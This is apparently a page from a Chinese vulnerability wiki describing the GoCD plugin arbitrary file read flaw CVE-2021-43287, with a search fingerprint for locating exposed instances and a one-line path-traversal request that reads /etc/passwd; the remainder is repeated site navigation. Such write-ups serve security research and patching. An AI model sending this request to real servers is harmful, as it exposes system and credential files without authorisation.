GoCD plugin 任意文件读取漏洞 CVE-2021-43287

漏洞描述

GoCD，一个开源的持续集成和持续交付系统，可以在持续交付过程中执行编译，自动化测试，自动部署等等，与Jenkins类似。

GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞，导致攻击者可以获取服务器中的任意敏感信息

漏洞影响

GoCD

网络测绘

title="Create a pipeline - Go"

漏洞复现

主页面

验证POC

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd

CMS漏洞

images

OA产品漏洞

images

Web应用漏洞

images

base

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

中间件漏洞

images

云安全漏洞

images

人工智能漏洞

images

其他漏洞

images

开发框架漏洞

images

开发语言漏洞

images

操作系统漏洞

images

数据库漏洞

images

网络设备漏洞

images

GoCD plugin 任意文件读取漏洞 CVE-2021-43287

漏洞描述

漏洞影响

网络测绘

漏洞复现

images

images

images

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

images

images

images

images

images

images

images

images

images

GoCD plugin 任意文件读取漏洞 CVE-2021-43287 ​

漏洞描述 ​

漏洞影响 ​

网络测绘 ​

漏洞复现 ​

GoCD plugin 任意文件读取漏洞 CVE-2021-43287

漏洞描述

漏洞影响

网络测绘

漏洞复现